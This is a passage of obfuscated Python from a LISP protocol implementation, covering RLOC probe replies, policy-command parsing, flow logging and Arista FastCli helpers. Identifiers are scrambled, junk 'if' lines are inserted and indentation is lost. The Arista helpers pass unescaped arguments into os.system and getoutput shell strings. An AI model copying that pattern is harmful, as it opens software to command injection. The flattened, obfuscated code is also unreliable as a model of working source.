if 69 - 69: I1Ii111 / Ii1I - ooOoO0o
if 38 - 38: II111iiii % OoooooooOO / OoooooooOO . Ii1I . Ii1I
if 13 - 13: oO0o - i1IIi / i1IIi + OoooooooOO
if ( OooOOoOO0OO . rloc . is_null ( ) ) :
OooOOoOO0OO . rloc . copy_address ( oOIiII1I1I . rloc )
if 57 - 57: OoooooooOO / O0 + I1ii11iIi11i % I11i * oO0o / Ii1I
if 49 - 49: I1IiiI * ooOoO0o * OOooOOo + OoO0O00 + ooOoO0o
if 42 - 42: i1IIi . OoO0O00 % iII111i
if 57 - 57: I1ii11iIi11i / I1IiiI
if 69 - 69: iII111i - iII111i . OoO0O00 / oO0o - OoO0O00 + I1Ii111
OoiIii11i11i = None if ( o0o0o . is_null ( ) ) else I11I
O0OooOoOo00oo = I11I if ( o0o0o . is_null ( ) ) else o0o0o
lisp_send_map_request ( lisp_sockets , 0 , OoiIii11i11i , O0OooOoOo00oo , OooOOoOO0OO )
iIiI1 = oOIiII1I1I
if 73 - 73: IiII - O0 / iII111i
if 8 - 8: iII111i
if 35 - 35: o0oOOo0O0Ooo . I1Ii111
if 18 - 18: OoooooooOO - o0oOOo0O0Ooo % i1IIi
if ( iIIIio000 ) : lisp_install_host_route ( Oo0o , iIIIio000 , False )
if 28 - 28: Oo0Ooo * OoooooooOO . I1Ii111 . iIii1I11I1II1 - Oo0Ooo / OOooOOo
if 69 - 69: OoooooooOO
if 51 - 51: OoO0O00 + i11iIiiIii / II111iiii
if 52 - 52: o0oOOo0O0Ooo * I1ii11iIi11i % OoOoOO00 . Ii1I . OoO0O00 * I1Ii111
if 26 - 26: ooOoO0o % OoO0O00 * OoO0O00 * O0 . i1IIi
if ( ooOoOoO00OO0oooo ) : lisp_install_host_route ( Oo0o , ooOoOoO00OO0oooo , True )
if 32 - 32: i11iIiiIii
if 43 - 43: iIii1I11I1II1 + oO0o + OoooooooOO
if 69 - 69: Oo0Ooo - o0oOOo0O0Ooo
if 18 - 18: OoooooooOO
IiI += 1
if ( ( IiI % 10 ) == 0 ) : time . sleep ( 0.020 )
if 52 - 52: i1IIi - II111iiii / i1IIi . I1Ii111 . OoooooooOO - IiII
if 47 - 47: iIii1I11I1II1 / IiII
if 81 - 81: I1Ii111 . i1IIi / o0oOOo0O0Ooo
lprint ( "---------- End RLOC Probing ----------" )
return
if 30 - 30: i11iIiiIii . I1IiiI
if 5 - 5: Ii1I / O0 + iIii1I11I1II1
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
if 12 - 12: I1ii11iIi11i - i11iIiiIii + I1IiiI . Oo0Ooo
if 26 - 26: oO0o + I1Ii111 + IiII * o0oOOo0O0Ooo . oO0o
if 95 - 95: OoOoOO00 . I1Ii111 / Ii1I . I1Ii111 % OoO0O00
if ( lisp_i_am_itr == False ) : return
if 16 - 16: Ii1I / I1IiiI / I1IiiI - OoooooooOO
if 13 - 13: OOooOOo / OoooooooOO
if 7 - 7: II111iiii - ooOoO0o
if 72 - 72: Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if ( lisp_register_all_rtrs ) : return
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
oOO0O = rtr . print_address_no_iid ( )
if 18 - 18: I1Ii111
if 100 - 100: ooOoO0o + I1IiiI * oO0o + ooOoO0o
if 24 - 24: i11iIiiIii + ooOoO0o
if 80 - 80: IiII % I11i % oO0o
if 97 - 97: i1IIi * i11iIiiIii / Ii1I - I1IiiI % IiII
if ( oOO0O not in lisp_rtr_list ) : return
if 70 - 70: iIii1I11I1II1
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( oOO0O , False ) , bold ( updown , False ) ) )
if 2 - 2: IiII - i1IIi * IiII % O0 / Ii1I
if 64 - 64: iII111i - Oo0Ooo
if 73 - 73: iIii1I11I1II1 * I1Ii111 * OoO0O00
if 68 - 68: ooOoO0o * Ii1I / I1ii11iIi11i * OoooooooOO + OoooooooOO . OoooooooOO
ii1I11Iii = "rtr%{}%{}" . format ( oOO0O , updown )
ii1I11Iii = lisp_command_ipc ( ii1I11Iii , "lisp-itr" )
lisp_ipc ( ii1I11Iii , lisp_ipc_socket , "lisp-etr" )
return
if 50 - 50: I1IiiI % o0oOOo0O0Ooo
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
if 56 - 56: I1IiiI * Oo0Ooo + OoO0O00 - oO0o * I1Ii111
def lisp_process_rloc_probe_reply ( rloc_entry , source , port , map_reply , ttl ,
mrloc ) :
OooOOoOO0OO = rloc_entry . rloc
OOO0O0O = map_reply . nonce
O00o000oOo0OO = map_reply . hop_count
I1IO0O00o0oo0oO = bold ( "RLOC-probe reply" , False )
i111Iii11I = OooOOoOO0OO . print_address_no_iid ( )
ooOOOo0o00 = source . print_address_no_iid ( )
oOo00000oOo = lisp_rloc_probe_list
o00O00 = rloc_entry . json . json_string if rloc_entry . json else None
i1 = lisp_get_timestamp ( )
if 56 - 56: I1IiiI . oO0o / I1Ii111 / IiII + Oo0Ooo
if 62 - 62: o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii + I11i . I11i / I11i
if 67 - 67: Oo0Ooo + Oo0Ooo . i11iIiiIii / IiII
if 53 - 53: I1ii11iIi11i
if 85 - 85: iIii1I11I1II1 - II111iiii + Ii1I
if ( mrloc != None ) :
i111iI1i = mrloc . rloc . print_address_no_iid ( )
if ( i111Iii11I not in mrloc . multicast_rloc_probe_list ) :
OooOo0o = lisp_rloc ( )
OooOo0o = copy . deepcopy ( mrloc )
OooOo0o . rloc . copy_address ( OooOOoOO0OO )
OooOo0o . multicast_rloc_probe_list = { }
mrloc . multicast_rloc_probe_list [ i111Iii11I ] = OooOo0o
if 61 - 61: I1IiiI / Ii1I . O0 + iII111i + oO0o / I11i
OooOo0o = mrloc . multicast_rloc_probe_list [ i111Iii11I ]
OooOo0o . last_rloc_probe_nonce = mrloc . last_rloc_probe_nonce
OooOo0o . last_rloc_probe = mrloc . last_rloc_probe
I1I1iIiiiiII11 , I11I , o0o0o = lisp_rloc_probe_list [ i111iI1i ] [ 0 ]
OooOo0o . process_rloc_probe_reply ( i1 , OOO0O0O , I11I , o0o0o , O00o000oOo0OO , ttl , o00O00 )
mrloc . process_rloc_probe_reply ( i1 , OOO0O0O , I11I , o0o0o , O00o000oOo0OO , ttl , o00O00 )
return
if 14 - 14: I11i % iII111i * i11iIiiIii % i1IIi
if 10 - 10: iIii1I11I1II1
if 42 - 42: Oo0Ooo * I1ii11iIi11i
if 77 - 77: ooOoO0o % I1IiiI * oO0o
if 91 - 91: OoOoOO00 * Oo0Ooo * IiII - I1IiiI
if 37 - 37: Oo0Ooo - oO0o / I1ii11iIi11i . o0oOOo0O0Ooo * Ii1I
if 95 - 95: i11iIiiIii - ooOoO0o / I11i / I1Ii111
oOOOo0o = i111Iii11I
if ( oOOOo0o not in oOo00000oOo ) :
oOOOo0o += ":" + str ( port )
if ( oOOOo0o not in oOo00000oOo ) :
oOOOo0o = ooOOOo0o00
if ( oOOOo0o not in oOo00000oOo ) :
oOOOo0o += ":" + str ( port )
lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( I1IO0O00o0oo0oO , red ( i111Iii11I , False ) , red ( ooOOOo0o00 ,
# iII111i . OoooooooOO - Oo0Ooo - IiII
False ) , port ) )
return
if 6 - 6: OOooOOo - I1IiiI . IiII
if 40 - 40: II111iiii
if 13 - 13: OoOoOO00
if 23 - 23: Oo0Ooo / II111iiii % OOooOOo % iII111i - Oo0Ooo / OoO0O00
if 7 - 7: Ii1I / I11i / II111iiii % I11i * I11i + iIii1I11I1II1
if 6 - 6: iIii1I11I1II1 * oO0o - iIii1I11I1II1 . O0 . O0
if 96 - 96: I1Ii111 * II111iiii % i11iIiiIii - oO0o
if 32 - 32: i11iIiiIii * o0oOOo0O0Ooo . OoooooooOO / O0
for OooOOoOO0OO , I11I , o0o0o in lisp_rloc_probe_list [ oOOOo0o ] :
if ( lisp_i_am_rtr ) :
if ( OooOOoOO0OO . translated_port != 0 and OooOOoOO0OO . translated_port != port ) :
continue
if 14 - 14: i11iIiiIii . I1Ii111 % I1ii11iIi11i . I1ii11iIi11i % IiII
if 93 - 93: iIii1I11I1II1 / IiII
OooOOoOO0OO . process_rloc_probe_reply ( i1 , OOO0O0O , I11I , o0o0o , O00o000oOo0OO , ttl , o00O00 )
if 91 - 91: i11iIiiIii % ooOoO0o - iII111i * I1Ii111 . i11iIiiIii
return
if 1 - 1: IiII + iIii1I11I1II1 * I1ii11iIi11i - IiII - i1IIi
if 75 - 75: II111iiii * o0oOOo0O0Ooo / I1ii11iIi11i
if 46 - 46: OOooOOo
if 67 - 67: OoO0O00 . I11i % OOooOOo + Oo0Ooo
if 40 - 40: OoO0O00 / I11i % iIii1I11I1II1 - ooOoO0o
if 51 - 51: Oo0Ooo % iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo
if 32 - 32: I1Ii111 * I1IiiI + Ii1I
if 30 - 30: OoooooooOO / I1IiiI . iIii1I11I1II1 / ooOoO0o
def lisp_db_list_length ( ) :
IiI = 0
for II1II1Iii1I in lisp_db_list :
IiI += len ( II1II1Iii1I . dynamic_eids ) if II1II1Iii1I . dynamic_eid_configured ( ) else 1
IiI += len ( II1II1Iii1I . eid . iid_list )
if 20 - 20: OoooooooOO * OOooOOo
return ( IiI )
if 77 - 77: Ii1I - OoooooooOO . OoOoOO00
if 93 - 93: OoooooooOO / I1Ii111
if 91 - 91: I1Ii111
if 18 - 18: ooOoO0o * I11i
if 53 - 53: I11i . i11iIiiIii - iIii1I11I1II1 / I1Ii111
if 86 - 86: i1IIi % OoO0O00 - OoooooooOO
if 63 - 63: o0oOOo0O0Ooo . iIii1I11I1II1 % IiII * i11iIiiIii
if 70 - 70: iIii1I11I1II1
def lisp_is_myeid ( eid ) :
for II1II1Iii1I in lisp_db_list :
if ( eid . is_more_specific ( II1II1Iii1I . eid ) ) : return ( True )
if 12 - 12: OoOoOO00 / o0oOOo0O0Ooo - I1ii11iIi11i + oO0o + O0
return ( False )
if 9 - 9: I1ii11iIi11i * OoooooooOO . O0 . ooOoO0o * i11iIiiIii / i1IIi
if 38 - 38: OoOoOO00 . OoooooooOO % I1ii11iIi11i . oO0o % oO0o
if 80 - 80: i11iIiiIii / OoOoOO00 . OOooOOo . iIii1I11I1II1
if 81 - 81: I1ii11iIi11i * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO
if 64 - 64: Oo0Ooo . I1ii11iIi11i / ooOoO0o % oO0o . iIii1I11I1II1
if 84 - 84: II111iiii . oO0o * O0 / iII111i + OoooooooOO
if 99 - 99: I1ii11iIi11i . oO0o + Oo0Ooo + I1ii11iIi11i / I1Ii111 . I1ii11iIi11i
if 95 - 95: OoOoOO00 * iIii1I11I1II1 / OoooooooOO % i1IIi
if 91 - 91: OOooOOo - OoOoOO00
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
if 58 - 58: II111iiii . OOooOOo % II111iiii * oO0o % OoO0O00 % I11i
if 71 - 71: Ii1I * II111iiii * I1IiiI
if 22 - 22: oO0o
if 96 - 96: ooOoO0o * iII111i . IiII
if 77 - 77: OOooOOo - I11i % o0oOOo0O0Ooo
if 46 - 46: I1IiiI % oO0o . OoooooooOO . IiII / I11i - i1IIi
if 43 - 43: OoOoOO00 - o0oOOo0O0Ooo
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if 22 - 22: i1IIi
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
oo000O0o = None
if ( rloc_str in lisp_nonce_echo_list ) :
oo000O0o = lisp_nonce_echo_list [ rloc_str ]
if 33 - 33: O0
return ( oo000O0o )
if 34 - 34: I1Ii111 . IiII % iII111i
if 94 - 94: OOooOOo % i11iIiiIii . OOooOOo
if 55 - 55: OoOoOO00 . OoOoOO00 % o0oOOo0O0Ooo . I11i . I1ii11iIi11i - o0oOOo0O0Ooo
if 1 - 1: i11iIiiIii - i1IIi * oO0o - iIii1I11I1II1
if 75 - 75: i1IIi * i11iIiiIii
if 40 - 40: I1ii11iIi11i + OoO0O00
if 8 - 8: i11iIiiIii - iIii1I11I1II1
if 73 - 73: OoOoOO00
def lisp_decode_dist_name ( packet ) :
IiI = 0
i1III = b""
if 12 - 12: O0
while ( packet [ 0 : 1 ] != b"\x00" ) :
if ( IiI == 255 ) : return ( [ None , None ] )
i1III += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
IiI += 1
if 77 - 77: oO0o % o0oOOo0O0Ooo % iII111i
if 28 - 28: OoOoOO00 . O0 - II111iiii - I1IiiI / OOooOOo % O0
packet = packet [ 1 : : ]
return ( packet , i1III . decode ( ) )
if 49 - 49: ooOoO0o % Ii1I
if 86 - 86: o0oOOo0O0Ooo - I1IiiI . II111iiii . I1Ii111
if 22 - 22: IiII
if 63 - 63: I1IiiI . OOooOOo . O0
if 32 - 32: Ii1I / OOooOOo * i1IIi / i1IIi + I1IiiI % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo
if 39 - 39: I1ii11iIi11i / o0oOOo0O0Ooo / Oo0Ooo * II111iiii - OoO0O00
if 66 - 66: OoO0O00 / oO0o / I1ii11iIi11i - oO0o
def lisp_write_flow_log ( flow_log ) :
iiI1i1I = open ( "./logs/lisp-flow.log" , "a" )
if 9 - 9: ooOoO0o * iIii1I11I1II1 * OoooooooOO
IiI = 0
for o0oO0o0O0o0Oo in flow_log :
OO0Oo00OO0oo = o0oO0o0O0o0Oo [ 3 ]
I1oO0 = OO0Oo00OO0oo . print_flow ( o0oO0o0O0o0Oo [ 0 ] , o0oO0o0O0o0Oo [ 1 ] , o0oO0o0O0o0Oo [ 2 ] )
iiI1i1I . write ( I1oO0 )
IiI += 1
if 96 - 96: Ii1I
iiI1i1I . close ( )
del ( flow_log )
if 90 - 90: II111iiii
IiI = bold ( str ( IiI ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( IiI ) )
return
if 93 - 93: i11iIiiIii / Ii1I * Oo0Ooo . iII111i % iII111i / IiII
if 15 - 15: OoOoOO00 % I1Ii111 - iIii1I11I1II1
if 52 - 52: i11iIiiIii * ooOoO0o
if 15 - 15: OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
if 91 - 91: ooOoO0o
if 47 - 47: II111iiii + I11i + ooOoO0o % Oo0Ooo / iII111i
if 9 - 9: O0 + IiII
def lisp_policy_command ( kv_pair ) :
o00oo = lisp_policy ( "" )
oo000 = None
if 47 - 47: O0 . Ii1I . I1ii11iIi11i % II111iiii * O0 % IiII
I1iII1111 = [ ]
for OoOOoO0oOo in range ( len ( kv_pair [ "datetime-range" ] ) ) :
I1iII1111 . append ( lisp_policy_match ( ) )
if 50 - 50: oO0o / II111iiii % OOooOOo
if 89 - 89: O0 * Ii1I / OoO0O00 / OoOoOO00 % iII111i * iIii1I11I1II1
for oo0o0 in list ( kv_pair . keys ( ) ) :
iiIiII11i1 = kv_pair [ oo0o0 ]
if 19 - 19: I1ii11iIi11i
if 42 - 42: OoOoOO00 / IiII
if 65 - 65: ooOoO0o - ooOoO0o * OoO0O00
if 99 - 99: I11i % ooOoO0o . I1Ii111
if ( oo0o0 == "instance-id" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
if ( IiIi . source_eid == None ) :
IiIi . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 44 - 44: ooOoO0o * I1IiiI / II111iiii / OoooooooOO
if ( IiIi . dest_eid == None ) :
IiIi . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 12 - 12: I1ii11iIi11i . OoOoOO00 * I1Ii111 - I1IiiI / oO0o * ooOoO0o
IiIi . source_eid . instance_id = int ( I1IIii )
IiIi . dest_eid . instance_id = int ( I1IIii )
if 6 - 6: i1IIi % II111iiii % Oo0Ooo + o0oOOo0O0Ooo
if 61 - 61: I11i / i11iIiiIii
if ( oo0o0 == "source-eid" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
if ( IiIi . source_eid == None ) :
IiIi . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 89 - 89: II111iiii
i1oO00O = IiIi . source_eid . instance_id
IiIi . source_eid . store_prefix ( I1IIii )
IiIi . source_eid . instance_id = i1oO00O
if 2 - 2: OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if ( oo0o0 == "destination-eid" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
if ( IiIi . dest_eid == None ) :
IiIi . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
i1oO00O = IiIi . dest_eid . instance_id
IiIi . dest_eid . store_prefix ( I1IIii )
IiIi . dest_eid . instance_id = i1oO00O
if 44 - 44: iII111i
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if ( oo0o0 == "source-rloc" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
IiIi . source_rloc . store_prefix ( I1IIii )
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
if 29 - 29: o0oOOo0O0Ooo - ooOoO0o
if ( oo0o0 == "destination-rloc" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
IiIi . dest_rloc . store_prefix ( I1IIii )
if 59 - 59: I11i / IiII * OoO0O00 / IiII . I1Ii111
if 82 - 82: OOooOOo . iIii1I11I1II1 + I1Ii111
if ( oo0o0 == "rloc-record-name" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . rloc_record_name = I1IIii
if 14 - 14: IiII . i11iIiiIii
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
if ( oo0o0 == "geo-name" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . geo_name = I1IIii
if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
if ( oo0o0 == "elp-name" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . elp_name = I1IIii
if 53 - 53: I1Ii111 % i11iIiiIii
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if ( oo0o0 == "rle-name" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . rle_name = I1IIii
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if ( oo0o0 == "json-name" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
IiIi = I1iII1111 [ OoOOoO0oOo ]
IiIi . json_name = I1IIii
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
if ( oo0o0 == "datetime-range" ) :
for OoOOoO0oOo in range ( len ( I1iII1111 ) ) :
I1IIii = iiIiII11i1 [ OoOOoO0oOo ]
IiIi = I1iII1111 [ OoOOoO0oOo ]
if ( I1IIii == "" ) : continue
i1IIiI1iII = lisp_datetime ( I1IIii [ 0 : 19 ] )
ii11IIiI1iIi = lisp_datetime ( I1IIii [ 19 : : ] )
if ( i1IIiI1iII . valid_datetime ( ) and ii11IIiI1iIi . valid_datetime ( ) ) :
IiIi . datetime_lower = i1IIiI1iII
IiIi . datetime_upper = ii11IIiI1iIi
if 93 - 93: I1Ii111 + OOooOOo % ooOoO0o / I1Ii111 % OOooOOo . IiII
if 37 - 37: iII111i * oO0o / oO0o / Ii1I % I11i
if 12 - 12: i11iIiiIii
if 62 - 62: oO0o + OOooOOo + oO0o + I1IiiI
if 10 - 10: IiII - Oo0Ooo % ooOoO0o
if 38 - 38: oO0o * o0oOOo0O0Ooo . I11i % II111iiii / I11i % Ii1I
if 19 - 19: II111iiii / i11iIiiIii * II111iiii + OoOoOO00 - OoOoOO00
if ( oo0o0 == "set-action" ) :
o00oo . set_action = iiIiII11i1
if 7 - 7: OoOoOO00 - OoO0O00 % OoOoOO00 . I1ii11iIi11i % Oo0Ooo * iII111i
if ( oo0o0 == "set-record-ttl" ) :
o00oo . set_record_ttl = int ( iiIiII11i1 )
if 90 - 90: IiII - OOooOOo + iIii1I11I1II1
if ( oo0o0 == "set-instance-id" ) :
if ( o00oo . set_source_eid == None ) :
o00oo . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 88 - 88: ooOoO0o . o0oOOo0O0Ooo . OOooOOo - I11i
if ( o00oo . set_dest_eid == None ) :
o00oo . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 76 - 76: IiII % I1IiiI . iII111i
oo000 = int ( iiIiII11i1 )
o00oo . set_source_eid . instance_id = oo000
o00oo . set_dest_eid . instance_id = oo000
if 5 - 5: ooOoO0o . oO0o - OoOoOO00 - OoooooooOO
if ( oo0o0 == "set-source-eid" ) :
if ( o00oo . set_source_eid == None ) :
o00oo . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 2 - 2: OOooOOo
o00oo . set_source_eid . store_prefix ( iiIiII11i1 )
if ( oo000 != None ) : o00oo . set_source_eid . instance_id = oo000
if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
if ( oo0o0 == "set-destination-eid" ) :
if ( o00oo . set_dest_eid == None ) :
o00oo . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
o00oo . set_dest_eid . store_prefix ( iiIiII11i1 )
if ( oo000 != None ) : o00oo . set_dest_eid . instance_id = oo000
if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
if ( oo0o0 == "set-rloc-address" ) :
o00oo . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o00oo . set_rloc_address . store_address ( iiIiII11i1 )
if 78 - 78: OoO0O00 - i1IIi % I1Ii111
if ( oo0o0 == "set-rloc-record-name" ) :
o00oo . set_rloc_record_name = iiIiII11i1
if 87 - 87: I11i
if ( oo0o0 == "set-elp-name" ) :
o00oo . set_elp_name = iiIiII11i1
if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
if ( oo0o0 == "set-geo-name" ) :
o00oo . set_geo_name = iiIiII11i1
if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
if ( oo0o0 == "set-rle-name" ) :
o00oo . set_rle_name = iiIiII11i1
if 4 - 4: OOooOOo + II111iiii
if ( oo0o0 == "set-json-name" ) :
o00oo . set_json_name = iiIiII11i1
if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
if ( oo0o0 == "policy-name" ) :
o00oo . policy_name = iiIiII11i1
if 43 - 43: i11iIiiIii * I1IiiI
if 48 - 48: Oo0Ooo - OOooOOo / iII111i % I1ii11iIi11i . OoOoOO00
if 6 - 6: i11iIiiIii
if 51 - 51: o0oOOo0O0Ooo - OoooooooOO - I11i % i11iIiiIii / I1IiiI + IiII
if 91 - 91: O0
if 13 - 13: o0oOOo0O0Ooo
o00oo . match_clauses = I1iII1111
o00oo . save_policy ( )
return
if 15 - 15: iIii1I11I1II1 * Oo0Ooo . iIii1I11I1II1 . Ii1I % iII111i - i11iIiiIii
if 77 - 77: ooOoO0o - o0oOOo0O0Ooo * OoOoOO00 % oO0o
lisp_policy_commands = {
"lisp policy" : [ lisp_policy_command , {
"policy-name" : [ True ] ,
"match" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"source-eid" : [ True ] ,
"destination-eid" : [ True ] ,
"source-rloc" : [ True ] ,
"destination-rloc" : [ True ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"datetime-range" : [ True ] ,
"set-action" : [ False , "process" , "drop" ] ,
"set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
"set-instance-id" : [ True , 0 , 0xffffffff ] ,
"set-source-eid" : [ True ] ,
"set-destination-eid" : [ True ] ,
"set-rloc-address" : [ True ] ,
"set-rloc-record-name" : [ True ] ,
"set-elp-name" : [ True ] ,
"set-geo-name" : [ True ] ,
"set-rle-name" : [ True ] ,
"set-json-name" : [ True ] } ]
}
if 4 - 4: i11iIiiIii + OoOoOO00
if 45 - 45: ooOoO0o / OoooooooOO . Oo0Ooo
if 35 - 35: i11iIiiIii / o0oOOo0O0Ooo / oO0o / I11i . O0
if 53 - 53: i1IIi
if 51 - 51: OoOoOO00 / iIii1I11I1II1 . oO0o - I1ii11iIi11i - OOooOOo
if 90 - 90: i1IIi / oO0o * I1Ii111 + II111iiii % I11i
if 41 - 41: o0oOOo0O0Ooo - II111iiii . ooOoO0o . iII111i - ooOoO0o / iII111i
def lisp_send_to_arista ( command , interface ) :
interface = "" if ( interface == None ) else "interface " + interface
if 59 - 59: O0 / II111iiii * II111iiii - ooOoO0o
OO00oOOO0o0oo = command
if ( interface != "" ) : OO00oOOO0o0oo = interface + ": " + OO00oOOO0o0oo
lprint ( "Send CLI command '{}' to hardware" . format ( OO00oOOO0o0oo ) )
if 13 - 13: I1IiiI - Ii1I - iII111i - iIii1I11I1II1 . II111iiii
IIIIIII1IiIii = '''
enable
configure
{}
{}
''' . format ( interface , command )
if 100 - 100: oO0o . ooOoO0o
os . system ( "FastCli -c '{}'" . format ( IIIIIII1IiIii ) )
return
if 14 - 14: OoooooooOO + iII111i / iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1 - IiII
if 34 - 34: I1ii11iIi11i + i11iIiiIii - I1ii11iIi11i / OoOoOO00 + i1IIi . i11iIiiIii
if 48 - 48: I1ii11iIi11i % OoOoOO00 * OoOoOO00 % o0oOOo0O0Ooo * II111iiii / OoOoOO00
if 73 - 73: OoOoOO00 + OOooOOo * II111iiii . OOooOOo % I1Ii111 % oO0o
if 79 - 79: I1ii11iIi11i % I11i
if 78 - 78: i11iIiiIii % I1Ii111 + iIii1I11I1II1 + iII111i
if 66 - 66: I1IiiI - o0oOOo0O0Ooo
def lisp_arista_is_alive ( prefix ) :
i1iii1IiiiI1i1 = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
OoiIIIiIi1I1i = getoutput ( "FastCli -c '{}'" . format ( i1iii1IiiiI1i1 ) )
if 67 - 67: oO0o . iII111i * Ii1I - OOooOOo / oO0o
if 98 - 98: OoOoOO00 * OoO0O00 . Oo0Ooo
if 6 - 6: I11i % iIii1I11I1II1 + I1Ii111
if 48 - 48: II111iiii . OOooOOo . ooOoO0o - iII111i
OoiIIIiIi1I1i = OoiIIIiIi1I1i . split ( "\n" ) [ 1 ]
oOoO00ooo0 = OoiIIIiIi1I1i . split ( " " )
oOoO00ooo0 = oOoO00ooo0 [ - 1 ] . replace ( "\r" , "" )
